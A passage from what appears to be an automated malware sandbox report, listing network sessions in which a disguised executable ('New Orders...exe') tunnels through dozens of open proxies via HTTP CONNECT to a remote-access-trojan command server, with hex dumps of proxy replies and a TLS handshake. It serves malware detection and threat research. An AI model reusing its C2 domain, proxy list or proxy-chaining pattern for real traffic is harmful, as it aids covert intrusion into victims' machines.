                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1036192.168.2.953124184.170.245.14841457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.778487921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1037192.168.2.953008193.239.58.9280817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.779546022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1038192.168.2.952909202.166.219.8041537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.779644012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1039192.168.2.952450132.148.245.247262957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.780564070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.809984922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.836294889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.933479071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1040192.168.2.95303254.38.181.12531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.780694008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.476963997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.476814032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.476742029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.460841894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.461114883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.460850954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.164027929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:22.460627079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1041192.168.2.95297190.188.250.16807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.781663895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.599117994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1042192.168.2.953026120.26.68.107807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.782540083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.120840073 CET442INHTTP/1.1 405 Method Not Allowed
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: Apache
                                                                                        Allow: OPTIONS,GET,HEAD,POST
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 235
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for the URL /index.html.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1043192.168.2.953014193.136.97.17807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.783210039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.491547108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.904309034 CET806INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Server: Apache/2.4.56 (Debian)
                                                                                        Content-Length: 614
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1044192.168.2.95300495.84.166.13880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.783212900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1045192.168.2.952966103.163.51.254807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.785599947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.222610950 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1046192.168.2.953066196.20.125.12980837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.785602093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1047192.168.2.952974106.105.218.244807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.785610914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1048192.168.2.953159184.169.154.119807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.785614014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.958288908 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:43.958712101 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 5b d9 80 80 49 1a d2 70 3b 1e d5 d8 90 91 b8 9f 9b f5 84 cd 9c 8a 7b ea c6 f5 63 77 10 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: lhe [Ip;{cw*,+0/$#('=<5/artemis-rat.com#Kqk%Anq-23>>s0/)FG
                                                                                        Mar 11, 2024 16:16:44.136265039 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 80 c5 62 84 40 9a fa a8 09 65 f0 a1 c7 63 7c 1e 97 b3 52 29 f5 67 12 94 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9b@ec|R)gDOWNGRD0000*H010Uartemis-rat.com0240311151535Z260311151535Z010Uartemis-rat.com0"0*H0Ob-F>Ce2
                                                                                        Mar 11, 2024 16:16:44.204150915 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 cc a8 44 93 36 84 cd 7e cd 76 85 bc ac c7 ae 12 13 a6 2e a4 a0 63 c7 d9 a5 79 c5 12 67 57 52 05 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 82 19 b8 4a 40 90 80 23 86 5e 14 f7 13 3f 4d d5 ab 3f e7 47 b6
                                                                                        Data Ascii: %! D6~v.cygWR(J@#^?M?GuAOX
                                                                                        Mar 11, 2024 16:16:44.376733065 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 c6 90 6d e1 2c 36 40 05 34 1b 8c b9 7d 03 e2 c1 d4 88 44 a4 da c1 8a 75 6d b3 da e2 5b d0 c9 79 3b 75 a7 88 25 69 1f af
                                                                                        Data Ascii: (m,6@4}Dum[y;u%i


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1049192.168.2.952995103.49.202.252807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.785612106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1050192.168.2.95314945.60.186.208274887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.798392057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1051192.168.2.95312061.79.73.225807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.803564072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.102801085 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1052192.168.2.95300920.219.183.18831297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.806598902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.201355934 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1053192.168.2.953119121.66.198.7641457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.806790113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1054192.168.2.951957199.102.107.14541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.808456898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1055192.168.2.952050178.54.21.20380817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.810771942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1056192.168.2.953101161.97.163.52320927672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.856179953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.663919926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.664283991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
